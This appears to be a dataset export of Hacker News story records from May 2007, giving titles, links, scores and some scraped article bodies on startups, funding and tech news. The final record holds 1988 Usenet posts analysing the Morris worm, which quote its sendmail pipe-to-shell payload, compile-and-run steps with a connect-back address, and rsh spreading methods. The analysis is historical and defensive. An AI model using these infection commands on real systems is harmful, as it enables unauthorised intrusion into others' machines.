id
int64
2
42.1M
by
large_stringlengths
2
15
time
timestamp[us]
title
large_stringlengths
0
198
text
large_stringlengths
0
27.4k
url
large_stringlengths
0
6.6k
score
int64
-1
6.02k
descendants
int64
-1
7.29k
kids
large list
deleted
large list
dead
bool
1 class
scraping_error
large_stringclasses
25 values
scraped_title
large_stringlengths
1
59.3k
scraped_published_at
large_stringlengths
4
66
scraped_byline
large_stringlengths
1
757
scraped_body
large_stringlengths
1
50k
scraped_at
timestamp[us]
scraped_language
large_stringclasses
58 values
split
large_stringclasses
1 value
18,371
gibsonf1
2007-05-01T12:53:18
Wikipedia co-founder wants open-source search engine
null
http://news.com.com/Wikipedia+co-founder+wants+open-source+search+engine/2100-1032_3-6180379.html?tag=nefd.top
4
0
null
null
null
null
null
null
null
null
null
null
train
18,374
gibsonf1
2007-05-01T12:55:36
Comcast and Yahoo ink Internet advertising deal
null
http://news.com.com/Comcast+and+Yahoo+ink+Internet+advertising+deal/2100-1024_3-6180385.html?tag=nefd.top
1
0
null
null
null
null
null
null
null
null
null
null
train
18,375
gibsonf1
2007-05-01T12:56:23
Revamped Google tools let you be you
null
http://news.com.com/Revamped+Google+tools+let+you+be+you/2100-1038_3-6180365.html?tag=nefd.top
1
0
null
null
null
null
null
null
null
null
null
null
train
18,376
Sam_Odio
2007-05-01T12:56:27
iMac, iPod, iPhone... iGoogle??
null
http://venturebeat.com/2007/05/01/google-gets-personal-with-igoogle/
1
0
null
null
null
null
null
null
null
null
null
null
train
18,378
gibsonf1
2007-05-01T12:57:45
Microsoft takes Silverlight beyond Windows
null
http://news.com.com/Microsoft+takes+Silverlight+beyond+Windows/2100-1012_3-6180322.html?tag=nefd.top
4
2
[ 18425, 18473 ]
null
null
null
null
null
null
null
null
null
train
18,380
gibsonf1
2007-05-01T12:59:46
The Travails of Tracking Web Traffic
null
http://businessweek.com/technology/content/apr2007/tc20070430_491005.htm?chan=top+news_top+news+index_technology
2
0
null
null
null
null
null
null
null
null
null
null
train
18,384
veritas
2007-05-01T13:28:43
10 Golden Lessons From Steve Jobs
null
http://ririanproject.com/2007/04/20/10-golden-lessons-from-steve-jobs/
12
1
[ 19296 ]
null
null
null
null
null
null
null
null
null
train
18,385
unfoldedorigami
2007-05-01T13:31:04
Should you raise debt or equity?
null
http://www.venturehacks.com/articles/debt-or-equity
11
5
[ 18475, 18476 ]
null
null
no_error
Should I raise debt or equity?
2007-05-01T09:16:05+00:00
Nivi
· May 1st, 2007 Summary: If you raise convertible debt for a seed round, you should negotiate simple and short documents, close quickly and cheaply, and maintain your options for the Series A. But first, determine if you should raise debt or equity—debt is better for small financings with small discounts. Startups often raise their seed round by selling convertible debt instead of equity because debt is simpler and cheaper. Read Yokum Taku’s excellent series on convertible debt for a primer. Seed stage convertible debt agreements are fairly simple, especially if your investors are angels. There isn’t a lot to hack in these agreements. You should be more careful if your debt investors are VCs, but these debt financings are still much easier to negotiate than an equity financing. Later stage convertible debt can get complicated and adversarial. We know companies that took convertible debt from a corporate investor and couldn’t pay the debt back on time—which triggered the corporate investor’s right to take over the company. Fun stuff. If you are raising convertible debt, you should focus on negotiating simple and short documents, closing quickly and cheaply, and maintaining your options for the Series A. But first… Determine whether you should sell debt or equity. Let’s say your seed investors purchase debt with a 20% discount off the Series A share price. If you eventually sell shares in the Series A for $1 each, the seed investors will convert their debt to equity for $0.80/share. Now, let’s say your seed investors are willing to buy equity for $0.90/share instead of buying debt. Should you sell debt or equity? You should sell debt only if you can use the money to increase today’s share price by over 25% before the Series A financing. Otherwise, sell equity. In this example, debt is worthwhile if you think you can sell Series A shares for over $0.90/share × 125% = $1.125/share. Let’s say you decide to sell debt in your seed round and you raise a Series A at $2/share. After applying a 20% discount, your debt investors pay $1.60/share for their Series A shares. You were wise to sell debt to your seed investors in the seed round instead of selling them equity for $0.90/share. But if you raise a Series A at $1/share, your debt investors pay $0.80/share for their Series A shares. You should have taken their offer to buy equity at $0.90/share in the seed round. In general, you should sell debt only if you think it will increase your share price over today’s market price for your shares ÷ (1 – discount). Selling debt is usually better than selling equity in a typical seed round. If you are raising a typical seed round, say $50K-$500K, you probably want to sell debt instead of equity. If you raise enough seed debt to last 6-12 months, you should have enough time to increase your valuation by the 25%-100% required to overcome typical discounts of 20%-50%. For example, if you raise $250K in a seed round in return for 15% of your equity, your seed round pre-money valuation will be $1.42M. You should raise debt instead if you expect your Series A pre-money valuation to be at least $1.42M ÷ (1 – .2) = $1.77M (in the case of a 20% discount) or $1.42M ÷ (1 – .5) = $2.83M (in the case of a 50% discount). In general, if you don’t think you can increase your share price and valuation by 2 to 3 times in every round of financing from Series A to Series C, you should probably pack up and go home. In fact, the company’s share price typically increases the most from the seed round to the Series A as the business goes from nothingness to product, users, or revenue. Selling lots of debt may be worse than selling equity. If you are raising a large seed round, say $1M, you may want to sell equity instead of debt. For example, if you raise $1M in a seed round in return for 15% of your equity, your seed round pre-money valuation will be $5.67M. But if you raise $1M in return for debt at a 25% discount, your Series A pre-money will have to be at least $5.67M ÷ (1 – .25) = $7.56M for the debt to be worthwhile. $1M of seed financing may not take your Series A valuation above $7.56M—you may want to sell equity instead of debt in the seed round. How have you decided to raise debt or equity? Submit your thoughts and questions on raising convertible debt in the comments. We’ll discuss the most interesting ones in a future article.
2024-11-08T10:50:23
en
train
18,392
veritas
2007-05-01T14:06:46
Tech.view | Criminalising the consumer | Economist.com
null
http://www.economist.com/daily/columns/techview/displaystory.cfm?story_id=9096421
4
0
null
null
null
missing_parsing
Criminalising the consumer
2007-04-27T00:00:00.000Z
The Economist
Apr 27th 2007| IS IT legal to make a copy of that DVD you've just bought so the family can watch it around the home or in the car? In one of the most watched copyright cases in recent years, a judge in northern California ruled last month that copying DVDs for personal use was legal, given the terms of the industry's licence and the way the copies were made.Reuse this content
2024-11-07T08:50:48
null
train
18,394
dawie
2007-05-01T14:13:24
Dead Man Dancing
null
http://www.foundread.com/view/dead-man-dancing
8
2
[ 18395 ]
null
null
no_article
null
null
null
null
2024-11-08T09:31:42
null
train
18,397
Sam_Odio
2007-05-01T14:43:01
"Year Zero" project - the way a viral campaign should be run
null
http://www.37signals.com/svn/posts/403-year-zero-project-the-way-a-viral-campaign-should-be-run
14
0
null
null
null
null
null
null
null
null
null
null
train
18,398
msgbeepa
2007-05-01T14:47:58
Microsoft Launches Silverlight - Adobe Flash Killer
null
http://www.media-sight.net/2007/05/microsoft-launches-silverlight-flash.html
1
-1
null
null
true
null
null
null
null
null
null
null
train
18,399
dawie
2007-05-01T14:48:04
CSS Float Theory: Things You Should Know | Smashing Magazine
null
http://www.smashingmagazine.com/2007/05/01/css-float-theory-things-you-should-know/
6
3
[ 18464, 18650 ]
null
null
null
null
null
null
null
null
null
train
18,401
Sam_Odio
2007-05-01T14:50:59
IBM struggles to stay relevant w/ press, fails miserably
null
http://www.theregister.co.uk/2007/05/01/second_life_campaign/
4
1
[ 18467 ]
null
null
null
null
null
null
null
null
null
train
18,411
dawie
2007-05-01T15:22:34
How to Create Passionate Customers
null
http://www.pronetadvertising.com/articles/how-to-create-passionate-customers5329.html
1
0
null
null
null
null
null
null
null
null
null
null
train
18,412
mattjaynes
2007-05-01T15:24:29
Google Fails To Blink
null
http://www.techcrunch.com/2007/05/01/google-fails-to-blink/
13
11
[ 18428, 18442, 18443, 18439, 18526 ]
null
null
cut_off
Google Fails To Blink | TechCrunch
2007-05-01T11:20:17+00:00
Michael Arrington
4:20 AM PDT · May 1, 2007 Google responded to Viacom’s $1 billion lawsuit over alleged YouTube copyright infringement today. Their answer: Let’s fight this out, in front of a jury. We earlier predicted that there was no way Google would agree to a settlement with Viacom that involved any damages, and assumed that they would work to sign a licensing deal instead and convince Viacom to simply settle the lawsuit. Viacom later signaled that they weren’t much interested in a deal when they agreed to provide content to Joost and then did a search advertising deal with Yahoo instead of Google. I have visions of bloggers fighting to get a good seat at the trial, and live blogging the entire thing. The fate of YouTube’s buisness model, as well as many other web startups, will likely be linked to the outcome of this litigation. Most Popular Michael Arrington most recently Co-Founded CrunchFund after leading TechCrunch to a successful exit with AOL. His venture investments include Uber, Airbnb and Pinterest. Michael was the Editor of TechCrunch, which he founded in 2005. In 2008 Time Magazine named Michael “One of the World’s 100 most influential people”. Michael also practiced securities law at O’Melveny & Myers and Wilson Sonsini Goodrich & Rosati.Michael graduated from Stanford Law School and 
Claremont McKenna College. View Bio Newsletters Subscribe for the industry’s biggest tech news Related Latest in TC
2024-11-08T17:20:25
en
train
18,415
moses120042
2007-05-01T15:39:34
Jabber founder Jeremie Miller joins Wikia for search product
null
http://www.centernetworks.com/jabber-founder-joines-wikia-for-wikia-search
1
0
null
null
null
null
null
null
null
null
null
null
train
18,418
usablecontent
2007-05-01T15:43:46
Yahoo Signs Online Advertisement Deal With Comcast, Google Dumped Yet Again
null
http://startupmeme.com/2007/05/01/yahoo-signs-online-advertisement-deal-with-comcast/
4
0
null
null
null
null
null
null
null
null
null
null
train
18,422
jkush
2007-05-01T16:05:10
Document Arc Diagrams: Illustrates connected segments of a document that share a similar vocabulary
null
http://www.neoformix.com/Projects/DocumentArcDiagrams/index.html
6
2
[ 18440, 18445 ]
null
null
null
null
null
null
null
null
null
train
18,427
usablecontent
2007-05-01T16:13:24
Microsoft Joins The Party, Buying Internet Advertisement Firm 24/7 Real Media for $1 billion
null
http://startupmeme.com/2007/05/01/microsoft-joins-the-party-buying-internet-advertisement-firm-247-real-media-for-1-billion/
1
4
[ 18434 ]
null
null
null
null
null
null
null
null
null
train
18,435
transburgh
2007-05-01T16:46:15
Go BIG Interviews Guy Kawasaki: Avoiding Common Pitch Mistakes
null
http://www.gobignetwork.com/wil/2007/5/1/go-big-interviews-guy-kawasaki-avoiding-common-pitch-mistakes/10143/view.aspx
2
0
null
null
null
fetch failed
null
null
null
null
2024-11-08T13:06:41
null
train
18,437
whacked_new
2007-05-01T16:47:43
Here is a Basic Private Messaging Tool for news.yc Users
null
http://news.ycombinator.withmsg.com/
14
6
[ 18438, 18462 ]
null
null
null
null
null
null
null
null
null
train
18,441
jcwentz
2007-05-01T16:59:44
Condemned To Google Hell
null
http://www.forbes.com/home/technology/2007/04/29/sanar-google-skyfacet-tech-cx_ag_0430googhell.html
6
4
[ 18516, 18508, 18478, 18454 ]
null
null
http_404
404
null
ByJohn HyattForbes Staff
Daily Cover StoryHandicapping Trump’s Brain Trust: The New TrumpiverseByJohn HyattForbes StaffThe president-elect has long treasured close alliances with the rich and famous but this time around, he has a new group of fresh-faced loyalists. AI Startups, Investors Eagerly Await Less ‘Red Tape’ Under TrumpLeading AI startup founders and venture capitalists hope that a new Trump presidency will spur more acquisitions amid a laxer but not nonexistent regulatory environment.QUOTE OF THE DAY“Nowadays you’re only limited by your dreams. We think big and we dream big.”Huda Kattan, Founder of Huda Beauty
2024-11-08T17:50:30
null
train
18,452
nostrademons
2007-05-01T17:41:55
Homebrew and How the Apple Came to Be
null
http://www.atariarchives.org/deli/homebrew_and_how_the_apple.php
2
0
null
null
null
missing_parsing
Homebrew And How The Apple Came To Be
null
null
HOMEBREW AND HOW THE APPLE CAME TO BE by Stephen Wozniak Stephen Wozniak is the designer of the Apple II computer and cofounder of Apple Computer Inc.Without computer clubs there would probably be no Apple computers. Our club in the Silicon Valley, the Homebrew Computer Club, was among the first of its kind. It was in early 1975, and a lot of tech-type people would gather and trade integrated circuits back and forth. You could have called it Chips and Dips. We had similar interests and we were there to help other people, but we weren't official and we weren't formal. Our leader, Lee Felsenstein, who later designed the Osborne computer, would get up at every meeting and announce the convening of "the Homebrew Computer Club which does not exist" and everyone would applaud happily.     The theme of the club was "Give to help others." Each session began with a "mapping period," when people would get up one by one and speak about some item of interest, a rumor, and have a discussion. Somebody would say, "I've got a new part," or somebody else would say he had some new data or ask if anybody had a certain kind of teletype.     During the "random access period" that followed, you would wander outside and find people trading devices or information and helping each other. Occasionally one guy would show up and say, "Is there anyone here from Intel? No? Well, I've got some Intel chips we want to raffle off." This was before big personal computer firms and big money considerations. There was just one personal computer then, the Altair 8800, based around the Intel 8080 microprocessor.     The Apple I and II were designed strictly on a hobby, for-fun basis, not to be a product for a company. They were meant to bring down to the club and put on the table during the random access period and demonstrate: Look at this, it uses very few chips. It's got a video screen. You can type stuff on it. Personal computer keyboards and video screens were not well established then. There was a lot of showing off to other members of the club. Schematics of the Apple I were passed around freely, and I'd even go over to people's houses and help them build their own.     The Apple I and Apple II computers were shown off every two weeks at the club meeting. "Here's the latest little feature," we'd say. We'd get some positive feedback going and turn people on. It's very motivating for a creator to be able to show what's being created as it goes on. It's unusual for one of the most successful products of all time, like the Apple II, to be demonstrated throughout its development.     Today it's pretty obvious that if you're going to build a billion-dollar product, you have to keep it secret while it's in development because a million people will try to steal it. If we'd been intent on starting a company and selling our product, we'd probably have sat down and said, "Well, we have to choose the right microprocessor, the right number of characters on the screen," etc. All these decisions were being made by other companies, and our computer would have wound up being like theirs-a big square box with switches and lights, no video terminal built in . . .     We had to be more pragmatic. The 6502 microprocessor, for instance, was chosen for one reason only. It was the first one to sell over the counter for $20. The 8080 cost $370 at the time, and you couldn't get it at any surplus stores. You had to go down to a distributor, and they made you feel like you had to be a company with an account. It wasn't set up for hobbyists or experimenters.Apple Seedlings Steve Jobs was a friend of mine from high school. We were introduced because we had two things in common: electronics and pranks. It turned out that he had a tremendous drive to start a company. He had worked at Atari and had become friends with some of the key people there, including Nolan Bushnell, the founder. Nolan was his idol. Steve wanted to have a successful product, go out and start selling it, and make some money. He also had excellent product ideas for the upcoming home personal computer.     To produce the Apple I, Steve and I formed a partnership. We didn't sell very many Apple Is the first year. We built them at night in our garage. At first we expected to sell circuit boards at the Homebrew Club: just put in your own chips and it'll work. Then we got a $50,000 order from a local store and we were in heaven.     The trouble was how to get the money to build a hundred computers-they might cost over a hundred dollars each to build. Steve went to a local parts supplier and talked them into giving us a lot of parts on thirty days' net credit. It was very unusual for them to give us credit, because we didn't own anything. We didn't own houses. We didn't even own our cars. But Steve is very persuasive. We'd get the parts and then stuff them into the circuit boards, have them soldered, get them back in the garage and test them. And we could turn the whole cycle around in ten days and get paid. It worked really great because we had only one level of management.     We got our names established. The computer magazines started carrying lists of all the microcomputers coming out, and they'd describe all the characteristics-how much memory, which processor, was it assembled or was it a kit, what was its price. The Apple I had a good appearance, and we were always at the top of the lists because they were in alphabetical order.     After the Apple I was out, we tried to add new features. We thought about color and maybe some high-resolution graphics. I found ways to optimize and combine different parts of the circuits and make things with fewer chips. It's great to show off at a club that you use fewer chips than someone else. I did it for no other reason.     The Apple II came out of trying to improve the Apple I. From thinking out a way to make it with half as many chips, you could have a much better product. It was faster, it had color, it had high-resolution graphics, it had mixed modes on the screen with text. A lot of neat features made it look like this might be a nifty product. It turns out that some of its best features were inspired by what little experience we had.     Steve and I had done a game for Atari-Breakout for the arcades-before games were on microprocessors. We were running the Apple II down at the Homebrew Club, so I thought it would be neat if you could write Breakout in BASIC. I added graphics mode commands to the Integer BASIC I was writing. Breakout needs paddles: I had to add a little circuitry for paddle and push button. You need sound: when the ball hits the bricks, ping; when you lose, ehhhh. So I put a speaker in. All of these features were basically just to play one game.     These turned out to be common features for the personal computers that have come out since that time. We weren't quite the first to offer a keyboard and video output, but we were close. We were the first to offer built-in BASIC. We made the first built-in cassette port so you could use a cheap cassette recorder to load your programs in and store them. We had started to set standards for what have come to be known as low-cost personal computers.     Just about the only argument on product design Steve and I ever had was on the number of expansion slots. I wanted eight and he wanted two. I was for eight simply because I'd been around minicomputers that had a lot of extra function boards plugged in. Steve figured people would only use maybe a printer and a modem, and that was it. Fortunately we went with eight, because the Apple II's expandability was important to its success.     When we geared up to manufacture the Apple II, it looked like I'd have to leave my nice secure job at Hewlett-Packard. I thought about it and said no. I just loved going down to the Homebrew Computer Club, showing off my ideas and designing neat computers. I was willing to do that for free for the rest of my life. Steve got extremely anxious. He got all my friends and relatives to start phoning and tell me why I was making a mistake. Finally one of them called and said you can start a company, remain an engineer and also get rich. I decided that you can start a company and make money. Once I got the consciousness right, it was easy to quit HP and take this big risk.     We got our first ad agency and began discussing who we were and what our product was and how we would market it. Of course, to a marketer Apple was an odd name. It came from the days when you picked an interesting, fun name for a company. You do that when you're on a hobby basis. The ad agency kept telling us the name had to be changed. We had to have a name that suggested technology, number crunching, calculations, data bases. We took the attitude that Apple is a good name. Our computer would be friendly-everything an apple represents, healthy, personal, in the home. We had to hold our ground on that one. The agency designed our color logo. (Our original logo was Newton under the apple tree.) Steve twiddled the colors around and kept a rainbow orientation.COMPUTER GROUP GUIDE One of the most complete listings of user groups can be found in the annual Classroom Computer News Directory. Originally intended for teachers, this 200-page directory provides a wealth of information for general users on all aspects of computing, including sets of guidelines for hardware and software selection as well as a complete Yellow Pages of computer services and products.     The directory is available from Classroom Computer News, 341 Mt. Auburn St., Watertown, MA 02172. Telephone: (617) 923-8595. Core Memory We introduced the Apple II at the First West Coast Computer Faire. The first computer shows were informal, not like the professionally oriented shows we have today. They were more an outgrowth of computer clubs. We got a lot of our initial support from these clubs. I started speaking at them whenever I was invited, and I've been doing it from that day on. I travel at my own expense because I think it's exciting to tell the story of how our company sprang up from a club.     Our success was due to a number of factors. First of all, we had never manufactured computers before. We couldn't look back and say, "Here's how computers earned a lot of money in the sixties and seventies, that's the style to do." All we thought about was what was going to work out great in our own homes. Our motivation was what would be good in the end. If there was a known formula for what would make a successful product, and what would make a billion dollars, all the big companies would have jumped on it. All these companies were a lot smarter than us. What we had was luck. We did the right things with the right coincidences of timing and the right people in the right place.     We had a lot of interest and enthusiasm. The rewards that drove us were all intrinsic. The computers were being put together to show off at a computer club: "Look at this. I put in these neat commands." It's not like you get a better salary, or a better title, or more respect at work, or a new car. We had the autonomy of creators. We could decide what was going to make a neat computer. We could implement it, and we could show it off. We also had excellent feedback from our peers.     Back then, the small computer scene was based on the belief that we were all on top of a revolution. Everyone attending the club in 1975-76 knew there was a big computer revolution occurring and the rest of the world wasn't aware of it yet. That's why there was so much excitement and spirit. We were finally going to get control of our own computers. It wasn't a million-dollar thing that belonged to the company you worked for. This big thing that had so much value, and that we wanted to use and control, we finally were getting close to. Look at how many companies have sprung out of our Homebrew Computer Club. At last count, it was something like twenty-one! We managed to bring the computer revolution home.  I might get electrocuted. This particular anxiety was a favorite among our forefathers, who trotted it out when they were confronted by inventions like the light bulb and telephone. Rest assured: the computer keyboard's electrical current, about equal to that of a cordless electric shaver, is just too low to cause harm.  I'll never understand how to operate a computer. Nowadays, turning on the machine usually involves no more than flipping a switch and loading in a program. And in place of those undecipherable symbols that trigger long-forgotten fears of fractions, most programs now use English as the means of communication. Many of them also have pick-and-choose menu formats to guide you through available choices.  I might break it. You can't get that rough with a computer simply by typing on it and turning it on or off. Home computers are akin to any store-bought item: they vary in durability according to manufacturer, model, and wear and tear, and they have to be treated with a bit of respect. I have no sympathy for the user who douses his machine with coffee and complains when it prints out Martian dialect.  The machine might lose my work. Wiping out a sentence or two is always a possibility, as is destroying everything you've entered over the last five years. But you can guard against such losses by watching your delete commands and taking proper care of your floppy disks. Most important is that well-known data processing axiom: "Back it up." It takes no time at all to copy a program or data from one disk to another, thus assuring yourself of the ability to restore any work that gets lost along the way.  I might lose the privacy of my data. If you have the traditional stand-alone system, with no outside machines attached, your data is as safe as it would be on a piece of paper. For added security, don't let anyone read over your shoulder when you enter your data or password and remove the disk when your session is finished. If your computer is hooked up via modem and telephone line to a friend's machine, and if you happen to be paranoid about wiretapping, you can invest in encryption hardware or software to encode and decode your communications. As for the suspicion that someone will phone your computer and search through your disk-based data while you sleep, just keep the power turned off; no one has yet found a way to turn on a computer by remote control.  Computers have more capability than I need. This is also true of pencils, but how many people worry about not using them to draw works of art or create literary masterpieces? Personal computers range from relatively inexpensive units to quite elaborate affairs and offer a wide array of functions. Chances are, as you and your computer get used to each other, you'll expand your horizons and purchase software packages that increase your machine's versatility.  Using a computer will lower my status. This illusion circulates among office personnel who are actually afraid of looking silly as they try to master the new technology. If computers are that alien to you, especially if you're older or set in your ways, a gradual introduction is probably best. Sympathetic private tutoring can prevent loss of face before co-workers and convince you that business computers may enhance your status.  I might lose the ability to do things on my own. A computer is not an electrode-studded brain sapper, nor is it a device that turns users into Einsteins. As a tool, the computer simply helps you accomplish your work with maximum efficiency and expands rather than hinders your own capabilities. Erasing typewriter errors by hand, for example, impedes the creative act of writing, whereas correcting text on a personal computer is a pleasure. As for mathematics, is it more productive to hunt for a multiplication error or to be freed to explore new formulas?  A computer is mathematical and not for creative types. This view is held by artistes, literary denizens, and just plain folks with a morbid fear of numbers. The good news about computers is that if you don't want to play with accounting or physics, you can buy a word processing program to help with your writing, a music package to aid in composing, or a knee-slapping outer-space game to match your wits against. GEORGE S. ZARR, JR., Renaissance man and computer professional Return to Table of Contents | Previous Article | Next Article
2024-11-08T17:17:23
null
train
18,453
codeLove
2007-05-01T17:45:04
The Pita Principle for startups| Nirvana through bootstrapping [Aug 2001]
null
http://www.inc.com/magazine/20010801/23220.html
1
0
null
null
null
null
null
null
null
null
null
null
train
18,458
usablecontent
2007-05-01T18:20:11
Ad Exchange Gold Rush Continues, ContextWeb Also Launches an Ad Exchange called "ADSDAQ"
null
http://startupmeme.com/2007/05/01/contextweb-also-launches-an-ad-exchange-adsdaq/
4
0
null
null
null
null
null
null
null
null
null
null
train
18,460
far33d
2007-05-01T18:22:59
Murdoch going after the WSJ
null
http://online.wsj.com/article/SB117803255991188252.html?mod=blogs
7
1
[ 18491, 18527 ]
null
null
null
null
null
null
null
null
null
train
18,468
Tichy
2007-05-01T18:58:44
Are there good solutions for age verification?
null
4
8
[ 18469, 18486, 18551, 18471, 18553 ]
null
null
invalid_url
null
null
null
null
2024-11-08T16:37:59
null
train
18,490
jslogan
2007-05-01T20:27:46
Do you really value your customers or do you just want their money?
null
http://www.jslogan.com/content/view/165/
3
0
null
null
null
null
null
null
null
null
null
null
train
18,492
bootload
2007-05-01T20:43:46
Living online, with web apps
null
http://fortuito.us/2007/04/living_online_with_web_apps
5
3
[ 18496, 18515 ]
null
null
null
null
null
null
null
null
null
train
18,493
unfoldedorigami
2007-05-01T20:52:50
Amazon S3: New pricing model
null
http://blogs.smugmug.com/don/2007/05/01/amazon-s3-new-pricing-model/
13
3
[ 18572, 18500 ]
null
null
null
null
null
null
null
null
null
train
18,497
usablecontent
2007-05-01T21:41:13
Sonopia Raises $12.7 Million in Series B Funding for Mobile "Social" Network
null
http://startupmeme.com/2007/05/01/sonopia-raises-127-million-in-series-b-funding/
1
0
null
null
null
null
null
null
null
null
null
null
train
18,503
bootload
2007-05-01T21:59:39
stuckunstuck (twitter as gateway)
null
http://stuckunstuck.com/statuses/list
1
2
[ 18506, 18537 ]
null
null
fetch failed
null
null
null
null
2024-11-08T00:25:56
null
train
18,511
yaacovtp
2007-05-01T22:33:36
Yahoo finally gets a 10 pagerank
null
1
1
[ 18512 ]
null
null
invalid_url
null
null
null
null
2024-11-08T16:37:59
null
train
18,521
brett
2007-05-01T23:42:00
Memory leak patterns in JavaScript
null
http://www-128.ibm.com/developerworks/web/library/wa-memleak/
6
2
[ 18692, 18646 ]
null
null
null
null
null
null
null
null
null
train
18,523
brett
2007-05-02T00:00:02
Ask The VC - Supreme Court Issues Two Important Patent Decisions
null
http://www.askthevc.com/2007/05/supreme_court_issues_two_impor.php
3
0
null
null
null
null
null
null
null
null
null
null
train
18,530
smg
2007-05-02T00:21:17
Microsoft Memories on Fractals of Change
null
http://blog.tomevslin.com/2007/05/microsoft_memor.html
2
0
null
null
null
no_article
null
null
null
null
2024-11-08T08:38:36
null
train
18,532
andres
2007-05-02T00:29:01
Dell Picks Ubuntu Linux
null
http://www.redherring.com/Article.aspx?a=22152&hed=Dell+Picks+Ubuntu+Linux
9
3
[ 18755, 18576 ]
null
null
null
null
null
null
null
null
null
train
18,533
Sam_Odio
2007-05-02T00:31:46
Joost no longer in private beta
null
http://gigaom.com/2007/05/01/joost-almost-launches/
6
2
[ 18673, 18619 ]
null
null
null
null
null
null
null
null
null
train
18,539
rwalker
2007-05-02T01:15:48
Digg fights user revolt over HD-DVD ban -- Digg founders took HD-DVD sponsorship
null
http://texyt.com/Digg+founders+took+HD-DVD+sponsorship+00071
6
5
[ 18597, 18592, 18547, 18577, 18589 ]
null
null
null
null
null
null
null
null
null
train
18,545
brlewis
2007-05-02T01:33:02
iminlikewithyou invite in exchange for site feedback
null
4
19
[ 18546, 18562, 18604, 18560 ]
null
null
invalid_url
null
null
null
null
2024-11-08T16:37:59
null
train
18,563
andres
2007-05-02T02:57:29
Digg the Blog: What's Happening with HD-DVD Stories?
null
http://blog.digg.com/?p=73
1
0
null
null
null
no_title
null
null
null
null
2024-11-08T20:51:56
null
train
18,569
mtarifi
2007-05-02T03:04:47
Starting a company is like going to war [1998]
null
http://members.forbes.com/global/1998/1102/0116070a.html
3
0
null
null
null
null
null
null
null
null
null
null
train
18,574
dawie
2007-05-02T03:11:35
Can I please have a iminlikewithyou invite?
null
2
6
[ 18607, 18575 ]
null
null
invalid_url
null
null
null
null
2024-11-08T16:37:59
null
train
18,581
mtarifi
2007-05-02T03:23:04
Duke MBAs Fail Ethics Test
null
http://www.businessweek.com/bschools/content/apr2007/bs20070430_110466.htm?chan=top+news_top+news+index_businessweek+exclusives
1
1
[ 18582 ]
null
null
null
null
null
null
null
null
null
train
18,583
dawie
2007-05-02T03:25:39
Cool Concept: BarCardz Is the Cyber Calling Card
null
http://mashable.com/2007/05/01/barcardz/
4
4
[ 18591 ]
null
null
no_error
BarCardz Is the Cyber Calling Card
2007-05-02T00:30:30+00:00
null
Credit: BarCardz is a new social network aimed at putting a stop to cyber-stalkers.In essence, they've created a supremely elite way of creating your personal profile and building up your network. It starts with your BarCard. You can customize and print them (or have them shipped to you), and they operate like a business card, displaying some basic information and a way to get in touch with you through the BarCardz network. The only way to add friends is by getting a BarCard from them, or by handing one out. The receiver of course, has to join BarCardz and add you as a friend that way. There are games to play with other friends, and a Play Book giving hints and tips on how to maneuver through several social situations and how to spread your BarCard.BarCardz is a heavily closed community. They don't even have a search tab, so you can't find existing members on the site. This can be a good or bad thing, depending on what you'd like to use your social network for. In many ways this mimics (in reverse) the text messaging systems that are popular in the UK, masking your personal phone number but granting an opportunity to find and chat with others you're interested in for the purpose of eventually meeting them in person. All of your personal information is displayed on your BarCardz profile, so be sure to give your cards out to people you are truly interested in. BarCardz may be looking to curb cyber-stalkers, so hopefully they haven't created so many steps to finding friends that they've scared off everyone else in the process.
2024-11-08T14:28:21
en
train
18,590
nickb
2007-05-02T04:18:28
Digg shuts down user submissions after every story on the front page is the HD-DVD key
null
http://www.techpwn.com/?p=422
20
25
[ 18609, 18832, 18616, 18623, 18627, 18606, 18594, 18613 ]
null
null
null
null
null
null
null
null
null
train
18,596
staunch
2007-05-02T04:44:16
Crackbook Is Causing The Rapid Decline of the Dating Industry
null
http://plentyoffish.wordpress.com/2007/05/01/rapid-decline-of-the-dating-industry/
8
3
[ 18661, 18794 ]
null
null
null
null
null
null
null
null
null
train
18,601
staunch
2007-05-02T04:54:57
1988 Usenet Post About How the Internet ("Morris") Worm Worked
null
http://groups.google.com/group/news.sysadmin/browse_frm/thread/3bc71638708323b4/9c5e0b0eec39f696#9c5e0b0eec39f696
6
2
[ 18845 ]
null
null
Failed after 3 attempts. Last error: Quota exceeded for quota metric 'Generate Content API requests per minute' and limit 'GenerateContent request limit per minute for a region' of service 'generativelanguage.googleapis.com' for consumer 'project_number:854396441450'.
The virus
null
null
News Knowerunread,Nov 3, 1988, 11:58:27 AM11/3/88to The patch from Keith Bostic in the last message is *not* sufficient tohalt the spread of the virus. We have discovered from looking at thebinaries that the virus also attempts to spread itself via "rsh"commands to other machines. It looks through a *lot* of files to findpossible vectors to spread.If you have a bunch of machines with hosts.equiv set or .rhosts files,you should shut them *all* down at the same time after you have fixedsendmail to prevent a further infestation. If you don't clear outthe versions in memory, you won't protect your other machines.The virus runs itself with the name "sh" and then overwrites argv,so if a "ps ax" shows any processes named "(sh)" without a controllingtty, you have a problem. Due to the use of other uids from rsh,don't make any conclusions if the uid is one of your normal users.Also, check your mailq (do a mailq command). If you see any entriesthat pipe themselves through sed and sh, delete them from the queuebefore you restart your machines.Non-internet sites do not need to worry about this virus (for now!),but be aware that mail and news may not be flowing everywhere for sometime -- many sites are disconnecting from the Internet completelyuntil the virus is contained.Gene Spaffordunread,Nov 3, 1988, 5:11:06 PM11/3/88to This is an updated description of how the worm works (note: it is technically a worm, not a virus, since it does not attach itselfto other code {that we know about}):All of our Vaxen and some of our Suns here were infected with theworm. The worm forks repeated copies of itself as it tries to spreaditself, and the load averages on the infected machines skyrocketed. Infact, it got to the point that some of the machines ran out of swapspace and kernel table entries, preventing login to even see what wasgoing on!The worm seems to consist of two parts. The way that it works is asfollows:1) Virus running on an infected machine opens a TCP connection to avictim machine's sendmail, invokes debug mode, and submits a versionof itself as a mail message.*OR* it uses rsh to create itself on the remote machine throughan account requiring no password (due to hosts.equiv or .rhostsentries).Using the sendmail route, it does something like:From: /dev/nullTo: "|sed -e 1,/^$/d | sh; exit 0"cd /usr/tmpcat > x14481910.c <<'EOF'<text of program deleted?EOFcc -o x14481910 x14481910.c;x14481910 128.10.2.215 32341 8712440;rm -f x14481910 x14481910.c2) This program is a simple "listener" or "helper" program of a fewdozen lines of fairly simple code. As you can see, the helper isinvoked with arguments pointing back at the infecting worm (givinghostid/socket/checksum(?) as arguments).3) The helper then connects to the "server" and copies a number offiles (presumably to /tmp). After the files are copied, it exec's ashell with standard input coming from the infecting worm program onthe other end of the socket.From here, I speculate on what happens since I can't find the source tothis part lying around on our machines:4) The newly exec'd shell attempts to compile itself from the filescopied over to the target machine. The command file it uses is asfollows:PATH=/bin:/usr/bin:/usr/ucbrm -f shif [ 